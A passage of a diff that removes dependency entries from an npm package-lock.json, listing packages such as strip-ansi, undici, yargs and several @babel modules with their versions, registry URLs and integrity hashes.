"node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/table-layout": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", - "integrity": "sha512-iK5/YhZxq5GO5z8wb0bY1317uDF3Zjpha0QFFLA8/trAoiLbQD0HUbMesEaxyzUgDxi2QlcbM8IvqOlEjgoXBA==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "wordwrapjs": "^5.1.0" - }, - "engines": { - "node": ">=12.17" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tslib": { - "version": "2.8.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", - "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", - "license": "0BSD" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typical": { - "version": "7.3.0", - "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", - "integrity": "sha512-ya4mg/30vm+DOWfBg4YK3j2WD6TWtRkCbasOJr40CseYENzCUby/7rIvXA99JGsQHeNxLbnXdyLLxKSv3tauFw==", - "license": "MIT", - "engines": { - "node": ">=12.17" - } - }, - "node_modules/undici": { - "version": "6.21.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-6.21.3.tgz", - "integrity": "sha512-gBLkYIlEnSp8pFbT64yFgGE6UIB9tAkhukC23PmMDCe5Nd+cRqKxSjw5y54MK2AZMgZfJWMaNE4nYUHgi1XEOw==", - "license": "MIT", - "engines": { - "node": ">=18.17" - } - }, - "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "license": "MIT" - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wordwrapjs": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", - "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==", - "license": "MIT", - "engines": { - "node": ">=12.17" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.9.tgz", - "integrity": "sha512-5UamI7xkUcJ3i9qVDS+KFDEK8/7oJ55/sJMB1Ge7IEapr7KfdfV/HErR+koZwOfd+SgtFKOKRhRakdg++DcJpQ==", - "dev": true - }, - "@babel/core": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.9.tgz", - "integrity": "sha512-G2EgeufBcYw27U4hhoIwFcgc1XU7TlXJ3mv04oOv1WCuo900U/anZSPzEqNjwdjgffkk2Gs0AN0dW1CKVLcG7w==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.9", - "@babel/helper-compilation-targets": "^7.22.9", - "@babel/helper-module-transforms": "^7.22.9", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.1" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.9.tgz", - "integrity": "sha512-7qYrNM6HjpnPHJbopxmb8hSPoZ0gsX8IvUS32JGVoy+pU9e5N0nLr1VjJoR6kA4d9dmGLxNYOjeB8sUDal2WMw==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.9", - "@babel/helper-validator-option": "^7.22.5", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.9.tgz", - "integrity": "sha512-t+WA2Xn5K+rTeGtC8jCsdAH52bjggG5TKRuRrAGNM/mjIbO4GxvlLMFOEz9wXY5I2XQ60PMFsAG2WIcG82dQMQ==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - 